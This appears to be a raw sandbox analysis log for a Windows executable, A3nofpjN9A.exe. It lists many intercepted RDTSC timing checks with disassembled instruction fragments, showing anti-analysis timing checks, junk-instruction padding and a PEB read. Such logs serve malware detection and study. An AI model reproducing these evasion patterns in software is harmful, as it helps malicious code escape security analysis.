Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64C8A second address: D64C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64AE3 second address: D64AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5FC0CE52C6h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64AEE second address: D64AF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64AF3 second address: D64AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64AFB second address: D64B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64B07 second address: D64B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0CE52D2h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64B1E second address: D64B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64B24 second address: D64B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64B28 second address: D64B44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A11h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E30C05 second address: E30C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F5FC0CE52C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FA7B second address: E2FA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FA83 second address: E2FA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0CE52CAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FA92 second address: E2FA9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5FC0E77A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FC05 second address: E2FC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0CE52D0h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5FC0CE52D0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FC2B second address: E2FC33 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FC33 second address: E2FC42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FC42 second address: E2FC46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FDA1 second address: E2FDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FDA7 second address: E2FDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FDAC second address: E2FDB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FDB2 second address: E2FDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FF26 second address: E2FF36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E3037E second address: E3039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5FC0E77A06h 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5FC0E77A0Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E3039D second address: E303A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E303A1 second address: E303AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5FC0E77A06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E303AD second address: E303B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E3053C second address: E30540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E30540 second address: E30546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E30546 second address: E30551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F5FC0E77A06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E307E3 second address: E307ED instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5FC0CE52C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C26E56 second address: C26E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C26E66 second address: C26E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E3631C second address: E36320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E3637F second address: E36383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E36383 second address: E363B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+1244D24Dh], esi 0x00000014 push 00000004h 0x00000016 mov dx, 191Eh 0x0000001a push 985D6936h 0x0000001f push eax 0x00000020 push edx 0x00000021 jnc 00007F5FC0E77A0Ch 0x00000027 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E365E9 second address: E365F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E365F0 second address: E365F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E39873 second address: E39894 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5FC0CE52C6h 0x00000008 jnc 00007F5FC0CE52C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jne 00007F5FC0CE52D1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050096 second address: 705009C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705009C second address: 70500B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e pushad 0x0000000f mov cl, 49h 0x00000011 push eax 0x00000012 push edx 0x00000013 mov ax, dx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705019F second address: 70501B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0E77A0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70501B1 second address: 70501B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70501B5 second address: 70501E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [759B06ECh] 0x0000000e jmp 00007F5FC0E77A17h 0x00000013 test esi, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70501E2 second address: 70501E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70501E8 second address: 7050247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5FC0E77A18h 0x00000008 pop esi 0x00000009 mov dh, 5Ch 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F5FC0E78A31h 0x00000014 pushad 0x00000015 push ecx 0x00000016 movsx edx, cx 0x00000019 pop esi 0x0000001a jmp 00007F5FC0E77A11h 0x0000001f popad 0x00000020 xchg eax, edi 0x00000021 jmp 00007F5FC0E77A0Eh 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F5FC0E77A0Eh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050247 second address: 705028C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F5FC0CE52D6h 0x0000000f call dword ptr [75980B60h] 0x00000015 mov eax, 75F3E5E0h 0x0000001a ret 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5FC0CE52D7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705028C second address: 70502F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000044h 0x0000000b jmp 00007F5FC0E77A0Eh 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov edi, 780C66F0h 0x00000019 pushfd 0x0000001a jmp 00007F5FC0E77A19h 0x0000001f and eax, 28FF1476h 0x00000025 jmp 00007F5FC0E77A11h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70502F5 second address: 705031A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5FC0CE52CDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705031A second address: 705034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 0362A799h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ecx, edx 0x0000000f jmp 00007F5FC0E77A11h 0x00000014 popad 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5FC0E77A0Dh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705034B second address: 70503B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5FC0CE52D7h 0x00000008 pop ecx 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push dword ptr [eax] 0x00000011 pushad 0x00000012 mov cx, 8ACDh 0x00000016 pushfd 0x00000017 jmp 00007F5FC0CE52CAh 0x0000001c jmp 00007F5FC0CE52D5h 0x00000021 popfd 0x00000022 popad 0x00000023 mov eax, dword ptr fs:[00000030h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F5FC0CE52D8h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70503B7 second address: 70503BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70503BB second address: 70503C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70503C1 second address: 70503C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70503C7 second address: 70503CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70503CB second address: 70503CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050402 second address: 7050406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050406 second address: 705040A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705040A second address: 7050410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050410 second address: 7050416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050416 second address: 7050446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov si, F06Fh 0x0000000f mov si, 248Bh 0x00000013 popad 0x00000014 je 00007F602F5C4544h 0x0000001a jmp 00007F5FC0CE52CEh 0x0000001f sub eax, eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050446 second address: 705044A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705044A second address: 705044E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705044E second address: 7050454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050454 second address: 705048B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b pushad 0x0000000c mov cx, 7DD3h 0x00000010 movzx ecx, di 0x00000013 popad 0x00000014 mov dword ptr [esi+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5FC0CE52CEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705048B second address: 7050491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050491 second address: 7050495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050495 second address: 705052B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b pushad 0x0000000c mov esi, edi 0x0000000e call 00007F5FC0E77A0Bh 0x00000013 mov bh, ah 0x00000015 pop ebx 0x00000016 popad 0x00000017 mov dword ptr [esi+0Ch], eax 0x0000001a pushad 0x0000001b mov dx, cx 0x0000001e pushad 0x0000001f call 00007F5FC0E77A18h 0x00000024 pop ecx 0x00000025 mov dh, F6h 0x00000027 popad 0x00000028 popad 0x00000029 mov eax, dword ptr [ebx+4Ch] 0x0000002c pushad 0x0000002d jmp 00007F5FC0E77A18h 0x00000032 call 00007F5FC0E77A12h 0x00000037 mov eax, 6FB8B2C1h 0x0000003c pop ecx 0x0000003d popad 0x0000003e mov dword ptr [esi+10h], eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 jmp 00007F5FC0E77A16h 0x00000049 push esi 0x0000004a pop ebx 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705052B second address: 705058A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c pushad 0x0000000d movzx eax, bx 0x00000010 pushfd 0x00000011 jmp 00007F5FC0CE52D1h 0x00000016 sbb eax, 3E2A9BD6h 0x0000001c jmp 00007F5FC0CE52D1h 0x00000021 popfd 0x00000022 popad 0x00000023 mov dword ptr [esi+14h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5FC0CE52CDh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705058A second address: 705058F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705058F second address: 70505CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F5FC0CE52CDh 0x0000000a jmp 00007F5FC0CE52CBh 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov eax, dword ptr [ebx+54h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5FC0CE52D5h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70505CA second address: 7050626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5FC0E77A17h 0x00000009 or ecx, 56AAA7CEh 0x0000000f jmp 00007F5FC0E77A19h 0x00000014 popfd 0x00000015 movzx eax, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esi+18h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F5FC0E77A16h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050626 second address: 70506B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c pushad 0x0000000d jmp 00007F5FC0CE52D4h 0x00000012 pushfd 0x00000013 jmp 00007F5FC0CE52D2h 0x00000018 sub si, 1D08h 0x0000001d jmp 00007F5FC0CE52CBh 0x00000022 popfd 0x00000023 popad 0x00000024 mov dword ptr [esi+1Ch], eax 0x00000027 pushad 0x00000028 push edi 0x00000029 mov esi, 2E54DC4Dh 0x0000002e pop ecx 0x0000002f popad 0x00000030 mov eax, dword ptr [ebx+5Ch] 0x00000033 pushad 0x00000034 jmp 00007F5FC0CE52CFh 0x00000039 push esi 0x0000003a mov bl, 94h 0x0000003c pop esi 0x0000003d popad 0x0000003e mov dword ptr [esi+20h], eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F5FC0CE52D9h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70506B6 second address: 70506CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70506CB second address: 705073B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+60h] 0x0000000c pushad 0x0000000d call 00007F5FC0CE52CCh 0x00000012 pop ecx 0x00000013 jmp 00007F5FC0CE52D7h 0x00000018 popad 0x00000019 mov dword ptr [esi+24h], eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F5FC0CE52D4h 0x00000023 sbb ecx, 70469C18h 0x00000029 jmp 00007F5FC0CE52CBh 0x0000002e popfd 0x0000002f popad 0x00000030 mov eax, dword ptr [ebx+64h] 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705073B second address: 7050756 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx ecx, dx 0x00000009 popad 0x0000000a mov dword ptr [esi+28h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5FC0E77A0Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050756 second address: 7050768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050768 second address: 7050808 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+68h] 0x0000000e pushad 0x0000000f pushad 0x00000010 movzx esi, bx 0x00000013 mov dx, CC52h 0x00000017 popad 0x00000018 pushfd 0x00000019 jmp 00007F5FC0E77A13h 0x0000001e xor al, 0000004Eh 0x00000021 jmp 00007F5FC0E77A19h 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esi+2Ch], eax 0x0000002b pushad 0x0000002c mov dl, ah 0x0000002e mov dh, B6h 0x00000030 popad 0x00000031 mov ax, word ptr [ebx+6Ch] 0x00000035 jmp 00007F5FC0E77A10h 0x0000003a mov word ptr [esi+30h], ax 0x0000003e pushad 0x0000003f mov cx, A50Dh 0x00000043 pushfd 0x00000044 jmp 00007F5FC0E77A0Ah 0x00000049 sbb cx, E728h 0x0000004e jmp 00007F5FC0E77A0Bh 0x00000053 popfd 0x00000054 popad 0x00000055 mov ax, word ptr [ebx+00000088h] 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050808 second address: 705080C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705080C second address: 7050827 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050827 second address: 705082D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705082D second address: 7050831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
